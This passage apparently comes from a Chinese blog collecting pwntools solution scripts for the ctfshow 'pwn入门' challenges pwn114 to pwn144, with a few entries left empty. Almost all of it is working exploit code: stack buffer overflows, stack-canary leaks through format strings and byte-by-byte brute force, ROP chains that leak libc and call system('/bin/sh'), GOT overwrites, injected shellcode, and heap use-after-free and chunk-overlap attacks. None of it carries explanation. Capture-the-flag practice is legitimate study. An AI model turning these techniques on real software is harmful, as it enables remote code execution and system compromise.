payload += p64(pop_rsi)+p64(0x1000)+p64(pop_rdx)
payload += p64(7)+p64(mprotect_addr)+ p64(data)
io.sendline(payload)
getflag = asm(shellcraft.cat("/flag"))
io.sendline(getflag)
io.interactive()
pwn114
from pwn import *
io = remote("pwn.challenge.ctf.show",28290)
flagishere = 0xb94
io.recvuntil("Input 'Yes' or 'No': ")
io.sendline("Yes")
io.recvuntil("Tell me you want: ")
payload = b'a' * 0x100
io.sendline(payload)
io.interactive()
pwn115
from pwn import *
context.log_level = 'debug'
io = remote("pwn.challenge.ctf.show",28252)
backdoor = 0x80485a6
io.recvuntil("Try Bypass Me!")
payload = b'a' * 200
io.sendline(payload)
io.recvuntil(b'a' * 200)
canary = u32(io.recv(4)) - 0xa
print(hex(canary))
payload += p32(canary)
payload += b'a' * 12
payload += p32(backdoor)
io.sendline(payload)
io.interactive()
或通过格式化字符串
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28172)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
backdoor = 0x80485A6
io.recvuntil("Try Bypass Me!")
payload = b'%55$8x'
io.sendline(payload)
io.recv()
canary = int(io.recv(8),16)
print('canary:' + hex(canary))
payload = b'a' * 200 + p32(canary) + b'a' * 0xc + p32(backdoor)
io.sendline(payload)
io.interactive()
pwn116
from pwn import *
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28237)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
backdoor = 0x8048586
io.recvuntil("Look me & use me!")
payload = b'%15$8x'
io.sendline(payload)
io.recv()
canary = int(io.recv(8),16)
print('canary:' + hex(canary))
payload = b'a' * 32 + p32(canary) + b'a' * 0xc + p32(backdoor)
io.sendline(payload)
io.interactive()
pwn117
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28138)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil('Haha,It has reduced you a lot of difficulty!')
payload = b'a' * 504 + p64(0x6020A0)
io.sendline(payload)
io.interactive()
pwn118
from pwn import *
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28250)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
stack_chk_fail_got = elf.got['__stack_chk_fail']
getflag = elf.sym['get_flag']
payload = fmtstr_payload(7,{stack_chk_fail_got:getflag})
payload = payload.ljust(0x50,b'a')
io.sendline(payload)
io.recv()
io.interactive()
pwn119
from pwn import *
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28122)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
backdoor=elf.sym['backdoor']
canary = b'\x00'
for i in range(3):
for j in range(0,256):
print("idx:"+str(i)+":"+chr(j))
payload = b'a' * (0x70 - 0xC) + canary + bytes([j])
io.send(payload)
sleep(0.3)
text = io.recv()
print(text)
if (b"stack smashing detected" not in text):
canary += bytes([j])
print(b"Canary:" + canary)
break
payload = b'a' * (0x70 - 0xc) + canary + b'a' * 0xc + p32(backdoor)
io.send(payload)
io.recv()
io.interactive()
pwn120
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28258)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
poprdi = 0x400be3
poprsir15 = 0x400be1
bssaddr = 0x602010
leaveret = 0x40098c
payload = b'a' * 0x510 + p64(bssaddr - 0x8)
payload += p64(poprdi) + p64(elf.got['puts']) + p64(elf.symbols['puts'])
payload += p64(poprdi) + p64(0)
payload += p64(poprsir15) + p64(bssaddr) + p64(0) + p64(elf.symbols['read'])
payload += p64(leaveret)
payload = payload.ljust(0x1000,b'a')
io.recvuntil("How much do you want to send this time?\n")
io.sendline(str(0x1000))
io.send(payload)
io.recvuntil("See you next time!\n")
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libcbase = puts_addr - libc.symbols['puts']
shell = p64(libcbase + 0x4f302)
io.send(shell)
io.interactive()
pwn121
pwn122
pwn123
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28259)
elf = ELF('./pwn')
backdoor = elf.sym['init0']
offset = (0x34+0x4)/4
io.recvuntil("what's your name?")
io.sendline("123")
io.recvuntil("4 > dump all numbers")
io.recvuntil(" > ")
io.sendline("1")
io.recvuntil("Index to edit: ")
io.sendline(str(int(offset)))
io.recvuntil("How many? ")
io.sendline(str(backdoor))
io.recvuntil("4 > dump all numbers")
io.recvuntil(" > ")
io.sendline("0")
io.interactive()
pwn124
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28297)
elf = ELF('./pwn')
io.recvuntil(" * ************************************* ")
io.sendline("CTFshowPWN")
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()
pwn125
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28303)
elf = ELF('./pwn')
system_addr = 0x400672
binsh = b"/bin/sh\x00"
io.recvuntil(b" * ************************************* ")
io.recvuntil(b" * ************************************* ")
payload = binsh
payload = payload.ljust(0x2008,b"\x00")
payload += p64(system_addr)
io.sendline(payload)
io.interactive()
pwn126
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28226)
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
offset = 0x40 + 8
ret_addr = 0x4004c6
pop_rdi_ret = 0x4007a3
io.recvuntil(b"Let's go")
payload = b'a' * offset + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(elf.sym['main'])
io.sendline(payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym['puts']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
system_addr = libc_base + libc.sym['system']
io.recvuntil(b"Let's go")
payload = b'a' * offset + p64(pop_rdi_ret) + p64(bin_sh) + p64(ret_addr) + p64(system_addr)
io.sendline(payload)
io.interactive()
pwn127
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show",28258)
elf = ELF('./pwn')
libc = ELF('/home/XC/桌面/ctf/Pwn/ctfshow-pwn入门/libc.so.6')
offset = 0x88
ret_addr = 0x4004fe
pop_rdi_ret = 0x400803
io.recvuntil(b"See you again!")
payload = b'a' * offset + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(elf.sym['main'])
io.sendline(payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym['puts']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
system_addr = libc_base + libc.sym['system']
io.recvuntil(b"See you again!")
payload = b'a' * offset + p64(pop_rdi_ret) + p64(bin_sh) + p64(ret_addr) + p64(system_addr)
io.sendline(payload)
io.interactive()
pwn128
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
i = 0
while True:
i += 1
print(i)
io = remote('pwn.challenge.ctf.show',28267)
payload = b'a'*40
payload += b'\xca'
io.sendline(payload)
payload = b'a'*200
payload += b'\x01\x09'
io.sendline(payload)
try:
io.recv(timeout = 1)
except EOFError:
io.close()
continue
else:
sleep(0.1)
io.sendline(b'/bin/sh\x00')
sleep(0.1)
io.interactive()
break
pwn129
pwn130
pwn131
pwn132
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28270)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("CTFshow-daniu")
io.interactive()
pwn133
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28230)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("check")
io.interactive()
pwn134
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28192)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("Exit")
io.interactive()
堆利用-前置基础
pwn135
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28113)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("4")
io.interactive()
pwn136
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28301)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("4")
io.interactive()
pwn137
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28143)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil("Program Break Location")
io.sendline("1")
io.recvuntil("Program Break Location")
io.sendline("1")
io.recvuntil("Program Break Location")
io.sendline("1")
io.interactive()
pwn138
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28215)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("1")
io.sendline("1")
io.sendline("1")
io.interactive()
pwn139
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28289)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.interactive()
pwn140
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28289)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.sendline("1")
io.sendline("1")
io.sendline("1")
io.interactive()
pwn141
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28253)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
def add(size,content):
io.recvuntil("choice :")
io.sendline("1")
io.recvuntil("Note size :")
io.sendline(str(size))
io.recvuntil("Content :")
io.sendline(content)
def delete(index):
io.recvuntil("choice :")
io.sendline("2")
io.recvuntil("Index :")
io.sendline(str(index))
def output(index):
io.recvuntil("choice :")
io.sendline("3")
io.recvuntil("Index :")
io.sendline(str(index))
use_addr = elf.sym['use']
add(32,"aaaa")
add(32,"aaaa")
delete(0)
delete(1)
add(8,p32(use_addr))
output(0)
io.interactive()
pwn142
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28146)
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
def create(size,content):
io.recvuntil("choice :")
io.sendline("1")
io.recvuntil(":")
io.sendline(str(size))
io.recvuntil(":")
io.sendline(content)
def edit(idx,content):
io.recvuntil("choice :")
io.sendline("2")
io.recvuntil(":")
io.sendline(str(idx))
io.recvuntil(":")
io.sendline(content)
def show(idx):
io.recvuntil("choice :")
io.sendline("3")
io.recvuntil(":")
io.sendline(str(idx))
def delete(idx):
io.recvuntil("choice :")
io.sendline("4")
io.recvuntil(":")
io.sendline(str(idx))
create(0x18,"aaaa")
create(0x10,"bbbb")
#1
edit(0,"/bin/sh\x00"+"a"*0x10+"\x41")
delete(1)
create(0x30,p64(0)*4+p64(0x30)+p64(elf.got['free']))
show(1)
io.recvuntil("Content ")
free = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
libc_base = free - libc.symbols['free']
log.success('libc base addr:'+hex(libc_base))
system_addr = libc_base + libc.symbols['system']
edit(1,p64(system_addr))
delete(0)
io.interactive()
pwn143
pwn144
浙公网安备 33010602011771号